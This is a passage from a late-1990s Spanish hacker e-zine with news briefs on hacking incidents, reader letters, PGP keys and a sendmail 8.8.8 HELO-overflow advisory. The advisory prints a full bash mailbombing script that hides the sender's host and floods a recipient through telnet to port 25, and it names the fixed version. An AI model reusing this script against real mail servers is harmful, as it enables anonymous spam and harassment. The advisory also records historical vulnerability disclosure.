denominado Hispahack.

Dicho grupo habria accedido a los ordenadores de la NASA, la agencia espacial
americana, y al sistema informatico de la Universidad Politecnica de Catalu¤a,
donde fue descubierto. Una de sus travesuras consistio en sustituir por otra
la pagina que el Congreso de los Diputados mantiene en Internet.

(Articulo extraido del diario 'El Pais Digital')

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

MICROSOFT DEBE PONERSE A DISPOSICION DE LA JUSTICIA

El juez Thomas Penfield Jackson ordeno el viernes a Microsoft que Bill Gates y
16 de los mas importantes ejecutivos de la empresa deberan ponerse a
disposicion de la justicia para declarar las veces que sean necesarias en el
juicio por presuntas actividades monopolicas que se lleva adelante contra el
gigante del software. El magistrado tambien le exigio a Microsoft que de a
conocer el codigo principal de ciertas versiones de los sistemas operativos
Windows 95 y Windows 98. Estos requerimientos se producen tras la propuesta de
Microsoft que, alegando que Gates era "un hombre muy ocupado", habia
solicitado que el hombre fuerte de la empresa testificara por un maximo de
ocho horas en su presentacion del 12 de agosto y que se presentaran en la
corte no mas de ocho ejecutivos. Tras las declaraciones del juez Jackson,
Microsoft anuncio que acatara el pedido del magistrado aunque tambien lo
alerto de que hoy solicitara la desestimacion total del caso, una tactica que
para el abogado del gobierno, David Boies, "era previsible".

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

(Articulo de Merce Molist, redactora de 'El Ciber-P@is')

HACKERS ESPA¥OLES ATACAN LUGARES CHILENOS

La cuenta de correo de la Fundacion Augusto Pinochet y la oficial del citado
senador chileno fueron violadas, la semana pasada, por el grupo de hackers
Abstraccion, "como protesta por los continuos ataques a intereses espa¤oles en
Chile", segun revelaron en una nota enviada a "El Pais".
Abstraccion, un grupo hasta ahora desconocido en la escena espa¤ola, que
afirma estar en activo desde hace tres a¤os, descubrio las contrase¤as de las
dos cuentas y las cambio por "garzon" y "garzon1998", respectivamente, en lo
que ellos mismos calificaron de "bromilla": "Sabemos que esto solo les
causara una peque¤a molestia... pero es el principio". Al cabo de pocas horas,
la Fundacion Augusto Pinochet habia solventado el ataque.

Otros grupos de hackers espa¤oles se han unido a la causa y han intentado
reiterados "mailbombings" (bombardear un servidor con gran cantidad de
mensajes de correo) contra intereses chilenos en la red, aunque no han
funcionado porque las maquinas estaban preparadas para rechazarlos. Estas
acciones se enmarcan dentro del llamado "hacktivismo", la ultima tendencia en
el mundo "underground", que consiste en "hackear" por motivos sociales o
politicos.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

(Articulo de Merce Molist, redactora de 'El Ciber-P@is')

NO FUE UN SUICIDIO

El grupo aleman de hackers, Chaos Computer Club, ha hecho publica una nota en
la que duda de la hipotesis policial del suicidio para explicar la muerte de
uno de sus miembros mas brillantes, apodado "Tron": "Siempre tuvo un caracter
abierto y directo y nunca se guardaba los problemas para si mismo. Las
circunstacias bajo las que desaparicio y sus extraordinarias capacidades nos
han llevado a la conclusion de que ha sido victima de un homicidio". "Tron"
era un reconocido experto en sistemas de encriptacion aplicados a las
telecomunicaciones. Su ultimo exito habia sido demostrar que las tarjetas
alemanas de GSM se podian clonar.


*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

(Articulo de Merce Molist, redactora de 'El Ciber-P@is')

ASALTAN LA UNIVERSIDAD DE LA HIJA DE CLINTON

Durante las ultimas tres semanas, un grupo de hackers ha estado espiando
impunemente las comunicaciones electronicas de al menos 4.500 alumnos de la
Universidad de Stanford. Los piratas, suecos y canadienses, aprovecharon un
agujero del sistema para robar las contrase¤as de acceso al correo. Se da la
casualidad que en esta universidad, conocida por tener un reputado grupo de
expertos en seguridad, estudia la hija del presidente norteamericano, Chelsea
Clinton. No se ha esclarecido aun si su correo, que cuenta con medidas
adicionales de proteccion, tambien fue violado.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

El dia 17 de Diciembre se celebraron unas interesantes jornadas sobre la
confiabilidad en Internet. Un miembro de RareGaZz, PaTa, estuvo alli.

Se trataron temas tan interesanes como.

- Comunicaciones de voz y datos por internet.
- Banca y comercio electronico en internet.
- Seguridad en Internet.
- Firma electronica. Propuesta europea.
- Experiencia de Feste como proveedor de servicios de Certificacion.
- Las profesiones juridiacs y la seguridad en Internet.

Todo esto enfocado hacia la seguridad, fue un nivel asequible sin grandes
aspiraciones pero facilmente entedibles por los asistentes.

Se metio mucha ca¤a a temas como la firma digital para reconocer la identidad
del remitente de mensajes, la criptografia y sus aplicaciones y los
certificados digitales.

Solo decir que acudi con Chichus, y dimos el cantazo entre los asistentes de
mala manera, eramos los unicos que ibamos sin corbata bueno y la periodista
que asistio, que si hubiera ido sin ropa no nos hubiera importado.

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ C a r t a s d e l L e c t o r ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Disculpa, se que lo que pregunto es una estupidez, pero apenas estoy
aprendiendo. Donde compilo los archivos en c o que tengo que hacer con ellos?

[ Esta es, desgraciadamente, una pregunta muy frecuente. Yo siempre contesto
lo mismo: " Se compila en linux y se pone 'cc fichero.c -o fichero' ".
Pero no creo que sirva de mucho.
Quiero decir, que de que sirve hacerse root con un exploit que no sabes
como funciona? es mas .... si ni siquiera sabes como se compila!!! A ver
si os vais dando cuenta que eso no es hackear.
Para convertiros en verdaderos hackers primero debeis aprender algo de
informatica ... un minimo por lo menos. ]

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Desde ya, si les parece bien, podriamos

  
hacer un trato aunque no creo que para
uds sea negocio... pero... ense¤enme, manden la info que puedan para estos
lados y yo me comprometo a ayudar en lo que pueda con el desarrollo de la
pagina y la revista... aunque ya deben tener varios ayudantes... de todos
modos si pueden manden info...

[ Hay gente que opta por suscribirse a la lista de correo e ir aprendiendo
poco a poco, preguntando alli sus dudas, o incluso, preguntandonos a
nosotros directamente ... Yo hasta ahora he contestado todos mis mails (y
si no lo he hecho es porque me fallaria el correo); y estoy seguro de que
el resto de miembros de RareGaZz hace lo mismo.
Pero hay otra gente que quiere aprender por el camino facil. Quiere que se
lo ense¤es todo (y cuanto mas rapido y facil mejor) ... pues que sepa ese
tipo de gente que yo contesto a todas las dudas (siempre que este dentro
de mis posibilidades) pero NUNCA voy a ense¤ar desde cero y todo lo que se
a una persona. Si alguien quiere aprender que estudia y luego pregunte sus
dudas, pero que no pida que se le ense¤e todo. ]

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

ke tal, solo keria saber si siguen por aki xDDD

[ Pues claro que si!!!! al pie del ca¤on, como siempre ... y todo gracias a
vosotros. ]

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Hola soy lector de vuestro ezine y me he propuesto seleccionar unos cuantos
articulillos de diversas ezines para mi pagina. Me preguntaba si hay problema
o pasa algo.

[ Cualquiera puede incluir textos nuestros en su web ... siempre que ponga
de donde lo saco (por ejemplo: 'texto extraido de RareGaZz - http://
raregazz.acapulco.uagro.mx') ]


*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Este bug nos lo envio Mr. AZTECh y es sobre la version 8.8.8 de sendmail:

COMMANDO
Sendmail

SISTEMAS AFECTADOS
Sistemas corriendo el sendmail 8.8.8 (y anteriores) y MS Exchange

PROBLEMA

Michal Zalewski descubrio esto recientemente. Cuando alguien bombardea tu
correo, o trata de mandar correo falso, spam, etc - el programa de sendmail
adjunta la direccion del host del atacante asi como su direccion en el mensaje
que envia.

----
From mail@bomber.gob.mx Mon Jan 5 22:08:21 1998
Received: from salinas (carlitos@almoloya.edu.mx
[870.127.24.8])

by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: mail@bomber.gob.mx
Message-Id: <3.14159665@pi>

MAILBOOM!!!
----

Perfecto - Ahora sabes quien es el responsable de esa porqueria molesta en tu
correo: "Received: from salinas (carlitos@almoloya.edu.mx [870.127.24.8])".
Muy facil no?

Pero Zalewski encontro un peque¤o agujero, que le permite a un usuario esconder
su identidad, y enviar mails anonimamente. Lo unico que debes hacer es sobre
pasar la cadena del HELO, que es aproximadamente de 1024 caracteres - la
direccion del remitente y otra informacion interesante estara " cortada". Las
cabezeras de los mensajes, no contendran informacion interesante. (Pero no
siempre seran anonimos si esque se pueden obtener los logs de la maquina que
se uso para enviar el mensaje):

----
From mail@bomber.gov.mx Mon Jan 5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [muchas x (1024 aprox.]
...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: mail@bomber.gov.mx
Message-Id: <3.14159665@pi>

MAILBOOM!!! Adivina quien soy?
----

Aqui les pongo un simple ejemplo del uso del agujero del sendmail. Nota este
script ha sido escrito solo para demostrar que facil es enviar mails falsos,
bombardear correos, con la ayuda del Sendmail. El Script es muuuy lento y esta
restringido en muchas formas, pero ayuda a entender bien el problema (Nota,
algunos de los daemons no-Berkeley tambien se ven afectados):

#!/bin/bash
TMPDIR=3D/tmp/`whoami`
PLIK=3D$TMPDIR/.safe
TIMEOUT=3D2
LIMIT=3D10
MAX=3D20

echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski "
echo

if [ "$4" =3D "" ]; then
echo "USAGE: $0 msgfile address server sender"
echo
echo " msgfile - file to send as a message body"
echo " address - address of lucky recipient"
echo " server - outgoing smtp server w/sendmail"
echo " sender - introduce yourself"
echo
echo "WARNING: For educational use ONLY. Mailbombing is
illegal."
echo "Think twice BEFORE you use this program in any way.
Also,"
echo "I've never said this program is 100% safe nor bug-
free."
echo
sleep 1
exit 0
fi

if [ ! -f $1 ]; then
echo "Message file not found."
echo
exit 0
fi

echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo =

_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
_safebomb__sa=

febomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safeb=

omb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
omb__safebomb=

__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__s=

afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
afebomb__safe=

bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
bomb__safebom=

b__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
b__safebomb__=

safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
safebomb__saf=

ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
ebomb__safebo=

mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
mb__safebomb_=

_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
_safebomb__sa=

febomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safeb=

omb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
omb__safebomb=

__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__s=

afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
afebomb__safe=

bomb_\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=3D0

while [ -f $1 ]; do
$PLIK|telnet $3 25 &>/dev/null &
let SENT=3DSENT+1
echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
CONNECTED=3D`ps|grep -c "telnet $3"`
if [ "$LIMIT" -le "$CONNECTED" ]; then
while [ "$LIMIT" -le "$CONNECTED" ]; do
sleep 1
done
fi
if [ "$SENT" -ge "$MAX" ]; then
echo "It's just an example, sorry."
echo
exit 0
fi
done

Este bug a sido confirmado para MS EXCHANGE tambien

SOLUCION

Este bug fue arreglado en la version 8.8.9 del Sendmail, este limita el tamano
del parametro de HELO/EHLO para prevenir que los spammers oculten la
informacion de su conexion, la version se encuentra en:

ftp://ftp.sendmail.org/pub/sendmail/

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ L l a v e s P G P ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

NOTA: Azumlord tiene nueva llave PGP. Esta que aparece a continuacion es la
que vale. Asi que los que tengan la antigua que se la actualicen ...


<<::RareGaZz::>> // raregazz@iname.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

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
4XwaDg==
=crAP
-----END PGP PUBLIC KEY BLOCK-----

<<::Azumlord::>> // azumlord@iname.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQGiBDZs7KQRBADhZgrMXRignr0B3qj5k8GA7jJ2RpMBV9GuTFDy8UE0EZ02Ipn+
YjALiH8XbOaAkVDvpeCKnRFPNSsfyjYO+LCMkbhhEjPSH7Jcc4OAH9Z8GNXkxkLb
cvKVahaGhTePH6HmcHXLXCumrr9CxbVr7gd1MN052jhslqX7enRhD1DGhwCg/zfm
AIeYZLsTY1pJplKY9fhBo0cEAMQ4Vm/ElFbm/G/dAUgbzWGTS+eh7/U4IkXj7D/K
b/Y1aeju132w+CkuxbGv5tVa9BniCpy2HxFZv10qwpB2doUFCJF8JAPi2mPtVPIP
ZQM41KUtmQKagGZODcegSL+i+UAJYioOg8bDbt2ISlK6cjQpiYzuGy5cOGZLpRvs
1LddBACsY8C81guRvjgkeyxoUVJqR4B+T0+pQA62pFrDTIhq5XfcJmpykvKp7Ov2
9yLwf3Ws45iIHSvjPFG44snhZOEZ/UqrCvz5wbtXHOg0oyOzmLCuLeq4s5DPvFnz
XioZpJS0ufl822w1oMiDSnG/OtmKcXdF0HP6yUndkrfAmKSE9LQdQXp1bUxvcmQg
PGF6dW1sb3JkQGluYW1lLmNvbT6JAEsEEBECAAsFAjZs7KQECwMCAQAKCRAOw9/T
5ajPwb94AKCDWYsAKQ5lLPjpl2Z2OsH5+XIBsgCeOz7dvZiKN9ZjH6W1/y5PItO6
/C65Aw0ENmzsqxAMAMwdd1ckOErixPDojhNnl06SE2H22+slDhf99pj3yHx5sHId
OHX79sFzxIMRJitDYMPj6NYK/aEoJguuqa6zZQ+iAFMBoHzWq6MSHvoPKs4fdIRP
yvMX86RA6dfSd7ZCLQI2wSbLaF6dfJgJCo1+Le3kXXn11JJPmxiO/CqnS3wy9kJX
twh/CBdyorrWqULzBej5UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xk
hkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58
yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4
DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/
POGxKUAYEY18hKcKctaGxAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlL
IhkmuquiXsNV6UwybwACAgv/ebUao4hmXNPfGg3IbLvVtHNWaYrG58GoIZdr/LVg
psUW4B5MF71JEmKdtqCW+rB6XZs/YOVu2wzW+P/p2l5vnEJXwEeJiUDe8gp8vbZt
RtS8Tv3YSyqiBlMezxHEdLCQIMVdyI9BYjE/RT42v3MWCuov6RFFruDsE8I9x530
/yBbIkr5tF+BTZE6LkweSS7PxRDsZEmFZ1zDAZ21yTrEC/pJNGhrV1rE4/4/3aWu
DH8s+P1o5AkMW3RncnOigtX+MpWjCBfK+eGNGw7zp7T604qhymQb2TOLWAvUgDAk
WtcZvA8IUEvlY6wbsjE/3TDkow2re+rqGEgsM9R+6SQ8PD7dh4Zt8WOyYfmsytx8
RItchcBDk7atLpyju7pgZdiUULdwTf+CjVZBtWX55+qbJr29qc9TlWjDXWiLFr65
9fZXUx4c9RMLxdGRuw13KntQYnu9LBX4VGECidXU4HZqviE0vViFxmQh3J8vI2JL
yA8tmd4lMqnHlWFrNmUKe5z1iQBGBBgRAgAGBQI2bOysAAoJEA7D39PlqM/BNrAA
n01IqpjO1Ze5nxQEKdZuYK9LPGyIAKDyVelSYkyK08oE/E10gpv1C6mI6Q==
=N+Jt
-----END PGP PUBLIC KEY BLOCK-----

Cytorax // cytorax@bigfoot.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0
e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD
95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR
tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn
TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ
FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz
oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s
=Xw7I
-----END PGP PUBLIC KEY BLOCK-----


GuyBrush // guybrush@cyberdude.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

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
WT2KqINEIKul1WKXCwr6
=yQRv
-----END PGP PUBLIC KEY BLOCK-----


PaTa // pata666@bigfoot.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQGiBDYnQa4RBADAySpmFKPRfehd/ab08GUwbncNyr8WIMjdY/IzCWGli+oSu83B
2iapT6anGqBH5xA2ASe2o4787EsUTNo99G8dxERBJgraeboTOc98MRWBgr43zdWB
dQM0RHh5YuLljPbaDduzrg6HG9ITlo77X+eTeVntFoIBx++zQZFNwOC9iQCg/6QB
9vVTEY45BaXjM493pwaCS2UD/RXZ0G7Y4kxMKj92N3rnzAk0/MZRg4/hjWFeoggA
xP/hgYrhtOG+i4On8QOiW/uPwNBCbdpDZV9yVWUJnnyKf94GpDOIFXPuTtozMQPK
ElL18XD4N6Wjza74i16P4XTmF/LvBjQO6uqirdHg7KXkACAMXUEd2pzmsuwsZSwC
SsCrBAC1l+gVG6fTRLzXIMuYGIFa0DInElRdO9TpsVsQgVvGA7uEHZHfuqbEYbd/
M0LCmRGgziKR6vwMOVGjdrdihkXI6W1LB3lhbd/+7iLaIDqEY6ueVlxm5ykeWW7Z
